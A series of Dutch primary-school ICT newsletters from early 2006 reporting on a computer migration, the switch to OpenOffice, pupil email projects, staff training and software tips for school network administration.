We kregen een computertafel aangeboden door een school in Loosdrecht. Zo'n degelijke Comenius tafel. Bellen naar een transportbedrijf leerde ons, dat laten vervoeren tegen de 100 euro gaat kosten. We hebben het klusje nu aan een “snorder” uitbesteed. Dus Jos, hopelijk is hij aan het eind van de week uit je hal!

VOLGELOPEN MAILBOX

Wij laten de email die op ons schoolemailadres binnenkomt altijd op de server bij UPC staan. Dan kun je vanaf je vakantieadres of huisadres de schoolmail bekijken. Die mailbox moet regelmatig worden geleegd. Dat lukte deze week niet. De helpdesk bood uitkomst. Maar het is nog niet duidelijk wat er mis was.
De grote bestanden die we nog verwachten (zie onder) hebben we door dit incident niet ontvangen.

HANDLEIDINGEN OPEN OFFICE

We kregen de eerste lading manuals binnen. Volgende week meer hierover.

Het weekend begint deze keer erg vroeg wegens een scholing van het team van de Rosa Boekdrukker.

groeten,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-01-20 w03

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 3 - 2006 (20 januari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

POWERPOINT

Deze week was er weer een cursus powerpoint voor de liefhebbers hier op school. De meesten bereiden zich al voor op een presentatie voor ouders. Het begint er dus al op te lijken. Iedereen was weer reuze enthousiast. De volgende datum is nog niet bekend.

BEGELEIDINGSDIENST

Dinsdag hadden we een bijeenkomst met vertegenwoordigers van de begeleidingsdienst om de begeleiding bij de implementatie van de ICT leerlijn in de bovenbouw bij te stellen. We hebben besloten de rest van het jaar het in de groepen 6, 7 en 8 zonder begeleiding van buitenaf te doen. We zullen tijdens de bouwvergaderingen de voortgang in de ICT leerlijn (proberen te) bewaken.

REPLY-project

Alles is klaar voor de start van groep 5 met het REPLY project. Maandag zal er een opdracht binnenkomen. De opdracht komt uit een taalmethode en is een stelopdracht. In één week komen alle kinderen aan de beurt om de opdracht te maken en via de REPLY-knop op te sturen naar STAMPEI (de ict afdeling van de onderwijsbegeleidingsdienst). Het email programma hebben we zo ingesteld, dat de opdracht er mooi in kleur in verschijnt. De eerste opdracht is: “schrijf een elfje”. Het thema is “dieren”. Dat sluit geheel aan bij het taalthema waar ze in de groep mee bezig zijn. Volgende week zullen we de elfjes publiceren.

LEESLADDER

Om onbekende reden was een groep leerlingen uit de Leesladder (remediërend programma van Zwijsen) verdwenen. Binnen een kwartier had Peter de zaak vanuit een backup weer teruggezet en waren alle leerlingen er weer. Heerlijk, zo'n systeembeheerder op afstand.

LEREN TYPEN

Zouden we nu dan toch eindelijk het goede typeprogramma te pakken hebben? HWV-Software ( http://www.hwv-software.nl ) heeft een nieuw typeles programma dat er veelbelovend uitziet. Van het programma is een netwerkversie en een thuiswerkversie beschikbaar. Heeft iemand al ervaring met 'ik typ?

OUDE COMPUTERS/NIEUWE COMPUTERS

Onze DELL G1computers zijn gratis beschikbaar voor een school. Het gaat om 60 stuks identieke P2, 400 Mhz, 128 Mb RAM, 4,3 G, geluid, 10/100 netwerkkaart met PXE. Het zijn prima computers en wij zouden ze nog gewoon blijven gebruiken, ware het niet dat we nu terug willen in beheerkosten en dus van 3 soorten computers terug willen naar 1 soort. Vandaar de overgang, want verder is het prima materiaal en ook snel genoeg voor een school. Wie weet een school met belangstelling? Graag snel melden.
De nieuwe computers zijn intussen besteld.

NASCHOOLSE CURSUS ...

Op de tweede verdieping hebben we even snel 6 extra ps's ingezet. Na aansluiten even met de systeembeheerder gebeld die ze ook weer binnen een kwartier in het netwerk had zitten. Beheer op afstand blijft een vreugde.

FOTO'S GERDA

Dirk brandde thuis even wat foto's voor Gerda. Hij nam ze mee op zijn usb stick. Het vervelende is dat je dan ook je USB-stick-cd'tje nodig hebt. Daar kwam het idee: je zou de drivers van je eigen USB stick online moeten zetten, zodat je er altijd bij kan. Aldus gedaan. Voor de Site@School gebruikers: gebruik de up/download module en maak een plekje voor dit soort drivers.

Site@School

We zijn rustig bezig. Fred krijgt af en toe een bug-melding van de testers. Alles gaat volgens plan en in mei komt versie 2.4 uit.
We zijn bezig met de toegankelijkheid van het CMS en in contact met Stichting Bartiméus in Zeist (blindeninstituut). Als alles meezit wordt S@S het eerste CMS dat volledig volgens internationale normen van toegankelijkheid is gemaakt.

SERVERATSCHOOL

De documentatie vordert. Door een blunder van Dirk zijn we wat achteruit gezet. Niet Helen Pakhurst is de stichtster van het Dalton-onderwijs, maar Helen PaRkhurst. Allerlei teksten en plaatjes in de eindgebruikersdocumentatie moeten worden aangepast. Bah!!

TV IN HAL

Onze TV in de hal, waar je onze mededelingen in kan zien vertoonde vreemde kleuren. Wat bleek: Na maanden aanstaan deed het magnetisme van de luidsprekertjes in de tv zijn invloed op het beeld gelden. Contact met technische dienst: tv paar keer uitschakelen, laten afkoelen en weer inschakelen; dat activeert de automatische demagnetisatie. En ja, de kleuren zijn weer goed. Zie HIER voor het beeld van de tv.
Uiteraard zie je op de tv geen browser maar een volledig beeld.

Groet en goed weekend,
Karin, Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-01-26 w04

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 4 - 2006 (27 januari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

EMAIL PROJECT

Groep 5 heeft de eerste opdracht van het REPLY-PROJECT gedaan. Alle kinderen hebben een stelopdracht (maak een elfje) via de email opgestuurd naar de redactie van de onderwijsbegeleidngsdienst. We hebben de eljes op onze website gezet, zodat iedereen er van kan meegenieten. Kijkt u maar.

Met de leerlingenmodule van S@S kan een projectpagina worden gemaakt. Al;le leerlingen staan verzameld rond één thema.

ICT GROEP 3, 4 en 5

Deze week hadden we een bijeenkomst met de onderwijsbegeleidingsdient om met de leerkrachten van de groepen 3, 4 en 5 na te lopen, of alles nog wel wordt gedaan zolas we het in de ICTleerlijn hebben vastgelegd. In de groepen 3 en 4 heeft iedereen zich aan de afspraken kunnen houden. In groep 5 moet nog wat worden afgerond. Het email project loopt prima (zie boven).

COMPUTERTAFEL

We hebben van de Sterrenwachter (Loosdrecht) een computertafel gekregen. Ze hadden nog zo'n Comeniustafel over. Hartelijk dank, Jos!

NIEUWE COMPUTERS

Ze zijn gearriveerd, de 70 computers. We hebben afgesproken dat het hele netwerk in orde is na de Krokusvakantie. Het was weer eens flink schuiven om de 70 computers veilig op te bergen. De ruimte zag er zo uit voordat ze er stonden.

En nu ziet het er zo uit.

Ze zijn echt heel lekker klein. Na de Krokusvakantie zal het vernieuwde netwerk functioneren.

NIEUW IMAGE

Omdat de nieuwe computers moeten worden geconfigureerd, hebben we deze week een lijst gemaakt van alle software die op het nieuwe image moet komen. Volgende week zetten we lijst op de website.

BINNENGEKOMEN MAIL

”hooi ik ben Romee en ik ben 11 jaar ik zit in groep 8 en ik moet een werkstuk maken over scooters ik zelf vin dit een heel leuk onderwerp maar ik zoek me rot op het internet maar ik kan niets vinden over de geschiedenis van scooters kunnen jullie mij helpen?? xxx Romee”
Dit is een verzoek van een leerling die NIET bij ons bekend is en dus ook niet bij ons op school zit. Kwam binnen via de email van de website. Tja, en laat je dan zo’n kind maar zwemmen?
Jawel, ons advies was: “ga naar je eigen leerkracht”.

IK TYP

Deze week hebben we eindelijk een TYP programma gekocht. Het heet IK TYP en is van de firma HWV. Daar gebruiken we meer program,ma's van. Ze zijn simpel en doeltreffend.

MEUBILAIR

Langs twee wegen werden we er weer op attent gemaakt, dat we nog niet klaar zijn met het oplossen van de zithouding achter de computer. Eerst ontvingen we een email van Joost van de Slootermeerschool, die vroeg of we al geschikte stoelen/krukken hadden gevonden (had hij op onze website over gelezen). Een dag later vertelde onze stagiaire Betsy, dat ze bezig is met “muisje MAX” in groep 3. De kinderen leren hoe ze moeten zitten achter de computer. Maar dat valt niet mee, als de stoelen niet achter de tafels passen.
Dus opnieuw op zoek naar een goede kruk (zonder wielen, zonder gasveer, maar wel in hoogte verstelbaar)

Zou deze kruk wat zijn?
Heeft iemand nog suggesties?
We gaan in elk geval er een op proef bestellen.

OPEN OFFICE

Deze BIC is getypt in het tekstverwerkingsprogramma OPEN OFFICE. We hebben nu alle handleidingen binnen, waar we keurig en zeer weinig voor betaald hebben. Ze zijn gemaakt door de ICT afdeling van de gemeente Haarlem. Deze nieuwe versie van OpenOffice (nederlandse versie) is prachtig. Je kunt er zelfs PDFjes mee maken.

KLOKHUIS

De nieuwe klokhuis-agenda is weer op onze site online. Kijk maar.

Site@School

Deze week kwam de nieuwe beta (d) uit van versie 2.4. Dirk is aan het bijwerken van het manual begonnen en polst de medewerking van de leerlingen van de school in Florida waar vorig jaar het manual werd gecorrigeerd.

Het gaat goed met S@S. Er is nu ook iemand die (eindelijk) siteatschool.com heeft geclaimd. Het is Steve in Nieuw Zeeland. We wisten dat het domein siteatschool.com nog wij was en hadden het expres nooit geclaimd om anderen de kans te geven. We kennen Steve al een tijdje en kunnen hem alleen maar feliciteren.
Nu er naast de gratis dienstverlening door ons ook een commerciële aanbieder is, kunnen wij hem geld vragen als wij hem helpen. Zo komt langzamerhand één van de doelen van Dirk met S@S in zicht: betaalde Site@School. Want ook OSS ontwikkelaars hebben schoorsteentjes in hun nederinge woninkjes.

groeten en prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-02-02 w05

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 5 - 2006 (3 februari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

LEERLIJN GROEP 6, 7 en 8

In de loop der jaren zijn er meerdere versies van onze leerlijn gemaakt. De komende weken worden de leerlijnen van de bovenbouw onder de loep genomen. De bedoeling is, dat de ICT leerlijn in ons “Handboek” komt.In dat handboek staan alle regels en afspraken die er bij ons in school gelden.

WORDART

Groep 8 heeft wat foefjes geleerd met WordArt. In de werkbalk wordArt bewerken kun je opvuleffecten kiezen. Je kunt daarin een gemaakte painttekening via bladeren>bestand ophalen en de meest fantastische effecten maken. Hier volgt een voorbeeld van een in Paint gemaakte tekening die daarna in WordArt is gebruikt. Zie hier

TECHNIKA 10 VOOR MEISJES

Vorige week is de naschoolse activiteit “computers voor meisjes” van technika 10 begonnen. 12 meisjes uit de groepen 5 en 6 leren omgaan met kneepjes van het Internet en gaan een webpagina in HTML maken. De cursus duurt 10 weken. We zijn benieuwd naar al het moois.

KRUK

De vorige week getoonde kruk is gearriveerd. Kijk maar. Hij wordt nu uitgetest op duurzaamheid en handigheid in het gebruik.

LEESLADDER

De leerkrachten van de groepen 3 en 4 hebben op dinsdagmiddag geleerd hoe om te gaan met het remediërend programma “Leesladder”. Wij volgen bij ons op school “HET LEESPROTOCOL” Dus als er kinderen uitvallen, moeten we weten hoe we als een hulpmiddel de Leesladder goed kunnen inzetten. We gaan het nu een tijdje volgens de regels proberen.

EMAIL PROJECT IN GROEP 5

Er zijn weer mooie teksten gemaakt in groep 5. Ze zijn gebundeld en op de website gezet.

GROEP 4

De leerlijn tekstverwerken is deze week gekoppeld aan onze scholing "woorden in de weer"
Een woordcluster moet op verschillende manieren worden “geconsolideerd”. Dat deden de leerlingen van groep 4 door recepten te tikken. De woorden “ingrediënten” en “bereidingswijze” moesten worden gebruikt. Zie. De ICT vaardigheid was: selecteren (met het witte pijltje), onderstrepen en vet maken. Sommige kinderen hebben de titels in WordArt gemaakt. Die kun je in dit websitebeheersysteem niet mee kopiëren en moeten apart als een plaatje worden ingevoegd. Het is nog niet helemaal af.

KLEUTERBOUW

De plannen die er zijn in de kleuterbouw om de computer wat meer in te zetten voor TAAL, moeten weer worden opgepakt. In de laatste vergadering was het een agendapunt. Er komt nog een vervolgafspraak met de onderwijsbegeleidingsdienst.

NIEUWE COPIER

Twee weken geleden kregen we een nieuwe copier. Binnen 15 minuten had Peter hem van afstand aangesloten in ons netwerk. Vanaf elke computer kan een opdracht om te printen worden gegeven aan de kopieermachine.

DATUM MINI CURSUS FOTO'S OP DE WEBSITE ZETTEN

Op 27 februari komt een groepje leerkrachten van onze schoool leren om foto's op de website te zetten. Van te voren moeten ze 5 foto's digitaal inleveren, als ze die hebben. We zijn erg benieuwd hoe het zal gaan!

BOEK KLAAR

Dirk heeft een stuk leven eindelijk afgesloten. Deze week kwam een boek van hem uit in het Japans. Zie.
Is er iemand die Japans leest? Graag even melden zodat hij wat kan vragen, want er is hem iets niet duidelijk.

Dat was het weer!
groeten en een prettig weekend,
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-02-10 w06

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 6 - 2006 (10 februari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

DIGITALE VALENTIJNSKAARTEN

Er wordt gewaarschuwd voor een hoop ellende op het internet en in computers door het openen van digitale Valentijnskaarten. Ook als de kaart afkomstig is van een bekende, kan die al door een besmette computer zijn verstuurd. Wees dus verstandig en vertrouw geen enkele geliefde.

NASCHOLING

a.s. dinsdag is de 3e bijeenkomst “eigen vaardigheden”. Dan gaan we weer met een groep naar STAMPEI en krikken onze ICT kennis op.

ZITHOUDING BIJ COMPUTERS

We hebben de kruk. We hebben er ook over gepraat in de bouwvergadering van de groepen 3 t/m 8. We hebben ook nog een keer de stoel van de Slootermeerschool bekeken. (zie ergonautstoelen in diverse maten) Maar we zijn nog niet tevreden. Waarom is regulier schoolmeubilair zo duur? En waarom is er geen schoolmeubilair voor onze wensen?

REPLY PROJECT GROEP 5

Ook deze week is er weer hard gewerkt. Kijk op onze speciale pagina!

BOUWVERGADERING

Tijdens de bouwvergadering, deze week, zijn alle leerkrachten behalve die van de kleuterbouw, ervan op de hoogte gesteld, dat we na de Krokusvakantie niet meer aan de hand van de monopolist zullen lopen wat betreft ons tekstverwerkingsprogramma. Het nieuwe tekstverwerkingsprogramma, OpenOffice, is gemaakt door de wereldwijde bundeling van krachten (via het internet). Het drukt niet op de portemonnee van de overheid. Alleen nog windows98SE zullen we gebruiken tot ook dat vervangen kan worden. We verwachten, dat bij de omschakeling de leerlingen er weinig problemen van zullen ondervinden. Voor de leerkrachten zullen Karin en Dirk paraat staan om te ondersteunen.

TV MODULE

We vragen jullie aandacht voor één van de vele toepassingen van de TV Module (PeterB).

HET UUR U

nu gaat het beginnen, nu
verdwijnt de onzekerheid
van de mij gegunde tijd,
nu is het voor alles te laat.

Deze, uit hun verband gehaalde, dichtregels uit 'Het uur u' (1936) van Martinus Nijhoff schoten ons te binnen bij het voorbereiden van de migratie. In de voorjaarsvakantie zullen de Dellen ontmanteld worden :-) en de Compaqs hun intrede doen. Daarvoor moet nog een hoop gebeuren en veel besluiten genomen worden. Gaan we over op een hogere resolutie (1024 x768)? Wat zijn de consequenties? We verzamelen alle software omdat we een nieuw image maken vanaf een schone basis.
De lijst met te installeren software is voortdurend in ons achterhoofd. Voor de liefhebbers een preview. De lijst is nog niet af.
Commentaar, aanvullingen en opmerkingen zijn zeer welkom. Wat heb jij voor foefjes die het leven van leerlingen en leerkrachten vergemakkelijken? Wat doe jij met de instellingen van Internet Explorer? Ken je trucen bij de software die we willen installeren?Als gewoonlijk stelt de redactie voor iedere bruikbare tip een prijs ter beschikking. De eerste prijs is een COMPUTER! De tweede prijs is TWEE computers. Alle tips zullen uiteraard gepubliceerd worden, zodat jullie er allemaal wat aan hebben.

Groet en goed weekend,
Karin, Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-02-15 w07

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 7 - 2006 (17 februari)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

LEERLIJN versus OPENOFFICE

Deze week is er bekeken wat er allemaal aangepast moet worden om de ICT tekstverwerkingsleerlijn aan te passen aan OpenOffice. Er zullen wat oefeningen geschrapt moeten worden. o.a. een oefening die de “kolonne rode mieren” heet. In Word kun je bij opmaak>lettertype het tabblad “teksteffecten” kiezen. Dat kan in OpenOffice niet. Dat is geen ramp, want in een normale tekst zie je toch geen knippereffecten, een geprinte tekst is statisch. Op de website is het in onze editor toch ook niet te zien. Dus absoluut geen man overboord.

ICT BIJSCHOLING

foto's
Deze week weer een cursus bij Stampei. Iedereen verliet om 5 uur het gebouw met een tevreden gevoel. We hadden weer wat bijgeleerd. Er volgt nog één bijeenkomst in maart. Jammer genoeg hebben dan niet alle teamleden 2 verplichte bijscholingen gevolgd. We zullen kijken of er nog een inhaalbijeenkomst kan worden gepland.

TECHNIKA 10 en de COMPUTERS

We hebben gemerkt, dat er voordat Technika10 bij ons op school begon aan de NaSchoolseActiviteiten, beter overleg had moeten plaatsvinden. De dames die de cursus geven zijn niet genoeg bekend met de gang van zaken in ons netwerk. Er worden bestandjes op floppies meegenomen voor de kinderen, terwijl onze floppy-drives uitgeschakeld zijn. Er worden mappen op de bureaubladen gezet, terwijl bij het opstarten begonnen wordt met een schoon bureaublad. Er wordt niet ingelogd met de groepsnaam, waardoor er geen netwerkverbindingen zijn. Allemaal zaken die met goed vooroverleg boven tafel waren gekomen. Het argument: dit is de zevende school en we hebben zoiets nog nooit meegemaakt, snijdt geen hout. Zij geven de cursus, en zij worden betaald, dus zij moeten zorgen dat ze hun werkplek goed verkennen.

LEESLADDER

Deze week ontdekten we hoe er twee keer alle gegevens van groep 4 verloren hebben kunnen gaan.
Als je het programma opstart, kom je meteen in het leerkrachten gedeelte. Leerlingen die er vaak mee werken kunnen zelf opstarten, de goede groep kiezen en dan het leerlingengedeelte starten. Maar er was een leerling, die in plaats van de groep te OPENEN, op OPSLAAN klikte. Dan wordt er gevraagd of je de groep wilt vervangen. Als je dan op JA klikt, worden alle gegevens gewist. Wij hebben de gegevens gelukkig uit de back-up kunnen halen. En de keer dat we ontdekten hoe het gebeurde, konden we nog net voorkomen, dat er op JA werd gedrukt.
De firma Zwijsen geeft een oplossing om direct in het leerlingen gedeelte te kunnen opstarten, maar we moeten er nog op studeren, want we vragen ons af, of die suggestie alleen geldt voor een stand-alone versie.

BERENPROJECT

Na de Krokusvakantie begint het berenproject. In die week zullen de beren op reis gaan, zodat we op 6 maart van start kunnen gaan met het emailen.

TECHNIEK!!!

WAKE ON LAN

Onze nieuwe tweedehands compaqs blijken WOL te hebben. Dat wil zeggen dat je de computer op afstand aan kan zetten. Dat opent weidse perspectieven voor. We vonden een klein programmaatje waarmee we vanaf de server één of meerdere computers op afstand kunnen starten. Op die manier kun je dus met ServerAtSchool, bijvoorbeeld, iedere zaterdagochtend automatisch alle computers op afstand starten en ze van een vers image voorzien en ze weer af zetten. Op maandagochtend heeft dan iedereen een 'schone' computer.
Wat ook zou kunnen: de beheerder start op afstand 1 computer en kijkt wat ermee aan de hand is.

AANRADERS N.A.V DE VORIGE BIC

Matthijs maakte ons attent op een goede en snelle en gratis PDF reader:
Foxit: http://www.foxitsoftware.com/pdf/rd_intro.php
Een prima tip. Echter, Foxit is niet in het Nederlands. Dit bracht ons op http://kb.mozillazine.org/Adobe_Reader
waarin een Adobe versneller wordt genoemd:
http://www.tnk-bootblock.co.uk/prods/misc/index.php
Even geprobeerd. Werkt prima. Uiteraard geen garanties.

Dennis maakt ons attent op verschillende zaken: Firefox, Hitmanpro, Logmel en InstallRite.

Firefox
Dennis gebruikt Firefox in plaats van Internet Explorer. "Behalve dat het een veel prettigere browser is (tabbed browsing etc), is Firefox ook nog eens veel veiliger: er komt veel minder snel spyware op de pc en er komen maar heel weinig pop-ups doorheen."

Hitmanpro
Verder schrreef hij "Om je pc schoon te houden van spyware/malware: www.hitmanpro.nl Alleen als je XP op de machine's gaat draaien. De kracht zit hem in 1) in de combinatie van de gebruikte programma's en 2) dat hitman pro zoveel automatisch doet.

Logmen
Verder gaf hij aan: "LogMeIn.com: prachtige software om op afstand een pc over te nemen. Scheelt zo ontzettend veel werk (zeker in een groter gebouw of met een dependance). Werkt ook prima via internet."
De BIC redactie vond dit een wel heel dure oplossing. Voor het aantal PC's dat je in een school hebt, ben je al gauw een paar duizend euro per jaar kwijt. Kijk een naar TightVNC http://www.tightvnc.com/: OSS/GPL.

InstallRite
Als laatste van Dennis: "Install-Rite: Programmaatje wat een beetje werkt zoals Novell (vroeger) deed voor het installeren van programma's op identieke werkstations. Het maakt vooraf en achteraf (van het installeren van een software pakket) een snapshot en kijkt wat de verschillen zijn. Dit pakt het samen tot één pakketje, wat je daarna kunt uitrollen over je netwerk naar alle pc's toe (geen gedoe met dat je de cd nodig hebt, netwerk restricties/problemen voorkom je etc)."
Noot redactie over InstallRite en Hitmanpro: Wij zijn blij dat we dat soort programma's niet meer nodig hebben. Dankzij ons SABRINE programma (Semi Automatic Backup and Restore in a Network Environment) in ServerAtSchool zijn virusscanners, spyware dectectie en ingewikkelde installatieprocedures op werkstations overbodig geworden.

De redactie beloont deze tips graag. Helaas kan de redactie Matthijs en Dennis niet de eerste en tweede prijs toekennen. Ze krijgen de 29e en 30e prijs. Afhalen voor 1 maart heren! :-)

De school gaat volgende week dicht, en dan gaan de beheerders aan de slag met het nieuwe wagenpark samen met Joris en Karel en Peter en John en Dirk.

Prettig weekend/prettige vakantie.
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-03-01 w09

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 9 - 2006 (3 maart)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

BIC een dag te laat - zie onderaan.

ONS NIEUWE "WAGENPARK"

Na de vakantie stonden overal onze nieuwe computers. Ze zijn kleiner dan de oude, waardoor er overal meer werkbladruimte overblijft. Aan de inhoud moet nog het een en ander gebeuren. De educative software moet nog worden geïnstalleerd. En we zijn aan het wennen aan het gebruik van OpenOffice. Dus wel wat startproblemen, maar niet ernstig. Het geluid komt luid en duidelijk uit de computers, waardoor het noodzakelijk is er meteen koptelefoons in te steken. We hebben bijbesteld (en inmiddels ontvangen). Ook meteen een aantal microfoons om te gaan experimenteren met geluid in Powerpoint (dat heet nu "Impress". Of is daar een nederlandse vertaling voor?)

FOTO'S OP DE WEBSITE ZETTEN

Afgelopen maandag hebben 4 collega's geoefend om foto's op onze website te zetten. Eerst leerden ze dat de foto's netjes in een map moeten. Daarna worden ze verkleind naar ongeveer 800x600. Het enthousiasme is er. Nu de eerste productie nog.

PRINTER 2e VERDIEPING

Elke keer op de tweede verdieping lopen printopdrachten vast.We weten nog steeds niet of het door de leerlingen komt of door de printer.

BERENPROJECT

Onze beer gaat zo naar Friesland. Hij zit in een doos. (zie foto's) We zijn erg benieuwd naar de logeerbeer.

COMPUTER REGELS

Binnenkort zal in de vergadering nog eens ernstig gesproken worden over de regels mbt het gebruik van internet. Er moet meer uniformiteit in de school komen. De regels zijn er wel, maar houdt iedereen zich er aan? Kloppen ze nog? Moeten ze bijgesteld worden?
Ook gaan we op zoek naar een "deskundige" die de klassen rond komt om te vertellen over de gevaren van het internet.

TECHNIKA 10 De cursus voor meisjes die door Technika 10 wordt gegeven zal nog 5 lessen duren. De kinderen gaan op de leerlingenpagina's van onze website publiceren. De dames van technika 10 hebben ieder een eigen "probeerpagina" gekregen.

WOORDEN IN DE WEER

Wij hebben allemaal meegedaan aan de cursus. Daaruit vloeit voort, dat we goede woordenboeken in de school moeten hebben. Ook een handig hulpmiddel is Van Dale online woordenboek.

SITE@SCHOOL

Site@School kampt met zorgen. Niet wat betreft de nieuwe versie 2.4. Die gaat prima en hij komt, als gewoonlijk, op tijd af (mei 2006). Maar, wat niet zo goed gaat en waar we hulp voor nodig hebben is: - de vertaling van de handleiding in het Nederlands
- het maken van goede Nederlandse hanleidingen voor de leerlingen
- de volgende versie wordt verschikkelijk veel werk omdat er wat zaken anders willen aanpakken.

De handleidingen die de vrijwilligers tot nu toe maken blijven steken en zijn niet af. Goede leerlinghandleidingen zijn er niet en de volgende versie...zorgen... zorgen. Fred heeft minder tijd en wil ook doorontwikkelen. We denken erover om de nieuwe versie als betaald werk te laten uitvoeren. Ook denken we dat het tijd wordt dat al die scholen die Site@School gebruiken een kleine financiële bijdrage zouden kunnen leveren aan de continuïteit van Site@School.

We zijn benieuwd wat jullie denken. Een reactie zouden we zeer op prijs stellen.

Dit was hem weer, later dan gewoonlijk, want onze internetverbinding ligt er de hele dag al uit. De hele wijk zit zonder UPC-internet. (uit de meldingen blijkt, dat vannacht rond 04.35 uur de verbinding weer tot stand is gekomen)

groeten en prettig weekend.
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-03-10 w10

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 10 - 2006 (10 maart)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

BERENPROJECT

Het emailproject in groep 4 is begonnen. De beren hebben hun reis overleefd. Knotje is aangekomen in Franeker en Snuffie in Amsterdam. Kijk ook naar de foto's.TECHNIKA 10Tijdens de naschoolse activiteiten van technika 10 hebben de leerlingen een pagina op de website van onze school gemaakt. Het zou leuk zijn, als de kinderen er thuis ook aan gaan werken. Het valt wel op, dat de kinderen het vooral erg leuk vinden om plaatjes te publiceren.

WEBSITE

In het fotoalbum  op de website is deze week flink opgeruimd. In de map van de onderbouw is wat ordening aangebracht. Er zijn daar nu wat meer leerkrachten die foto's op de website kunnen zetten en dan geldt: "goed voorbeeld doet goed volgen".

HANDIG TOOLTJE

Alice (onderbouw) meldde dat de volumeregeling op de nieuwe computers niet zo handig is. Kleuters kunnen het volume niet meer zelfstandig hard/zacht zetten.

Vroeger: Volumeregeling op los speakertje; kleuter draait aan knopje.
Nu: In taakbalk volume harder zetten (ingewikkeld, want vele toepassingen schermvullend, dus eerst de windows toets of Control Esc, etc. dan met muis naar volume,etc ) Kortom, gedoe.
We vonden op http://www.reallyeffective.co.uk/ Sound Control: Een freeware vervanging van de Windows Sound Mixer applet. Vrijwel alle toetsencombinaties zijn bruikbaar om 't volume te beïnvloeden. Voor Windows 95 / 98 / NT4 / 2000 / XP en Millennium-Me.
Bij ons is nu Alt+ (harder) en Alt- (zachter). We testen 't nog.

EDUCATIEVE SOFTWARE

Met de nieuwe computers hebben we ook alle software opnieuw geïnstalleerd. Kostte veel tijd, maar nu zijn we definitief af van alle fouten die Dirk ooit maakte. Hoezee!

BUREAUBLADEN

Ook de bureaubladen zijn opnieuw ingericht zodat iedere groep na inloggen weer zijn eigen toepassingen heeft. Alleen de bureaubladen van de leerkrachten moeten nog.

ROMMEL OPRUIMEN

Nu de migratie naar de nieuwe tweedehandsjes voltooid is moet er nog veel klein werk gedaan worden: oude computers wegdoen, opruimen, speakerboxjes wegdoen. Heeft een school belangstelling?

groeten en prettig weekend!
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-03-13 w11

++++++++++++++++++++++++++++++++++++++++++++++++++++++
Baarsjes Informatie en Communicatie Jaargang 5 - week 11 - 2006 (17 maart)
Wat is er deze week op de Rosa Boekdrukker op ICT gebied gebeurd?
++++++++++++++++++++++++++++++++++++++++++++++++++++++

GRATIS CD-ROMS ONTVANGEN

We ontvingen een heel pakket met educatieve software. Het is altijd zo'n toer om uit te vinden of je iets hebt aan die software. Meestal werken we andersom: "is er behoefte aan een bepaald soort oefenstof?" En dan gaan we zoeken. Maar nu is het even anders. We zijn namelijk ons reken-oefenprogramma van "de wereld in getallen" -een hele oude versie- kwijt doordat de nieuw computers er te snel voor zijn. Dus als dan een cd-rom genaamd "bas telt mee" gratis aangeboden wordt, dan wil je wel even kijken. Het is een probeerversie: kan 50 x worden opgestart. Heeft iemand er al ervaring mee? Of gaat er niks boven het REKENWEB?

TECHNIKA 10

Ook deze week is er weer hard gewerkt door de meisjes in de groepen 5, 6 en 7 aan hun eigen pagina's op onze website. Kijk naar de foto's.
Hier een aantal van de pagina's:
Rayssa, Fadime, Esma, Esra, Rechelle, Sumeyye. Het is nog erg veel "plaatjeswerk" en weinig inhoudelijks.

EIGEN VAARDIGHEDEN

Deze week was er weer een unieke kans voor ons team om eigen vaardigheden op de computer bij te scholen. Het is erg prettig, dat iedereen zo enthousiast is. Het zorgt er ook voor, dat er steeds meer collega's digiwijzer worden. Maar helaas is het nog niet zover, dat een ICT coördinator overbodig is geworden.

OPRUIMING! KOOPJES!

De afd. ICT houdt weer opruiming. 2 towers, 4 desktops: P3, 800 MHz, 256 Mb RAM, 10 a 20 Gb HD, CD-ROM speler, Netwerkkaart 10/100 Mb. Gratis af te halen voor educatieve instellingen. Voor particulieren: een hartige taart op de vrijdagmiddag.

LET OP: op alle computers zit de GEEN GEZEUR garantie (voor ons).

VEILIG LEREN LEZEN

Helaas hebben we nog op 6 computers het oude Veilig Leren Lezen programma. Kan er niet af zonder de licentie te verliezen. Ze moeten dus nog een tijdje in de running blijven. We hebben ze weer wat opgetuigd.

MOZILLA FIREFOX

Documenten op de Cito site en de Dienst Maatschappelijke ontwikkeling Onderwijs waren niet down te loaden met Firefox. Na wat rommelen met de instellingen (aanzetten Popups en 'downloaden toestaan' op de Cito site) lukt één en ander prima.

groeten en prettig weekend!
Karin en Dirk

Reacties op deze nieuwsbrief graag richten aan de afdeling ICT

2006-03-18 w11

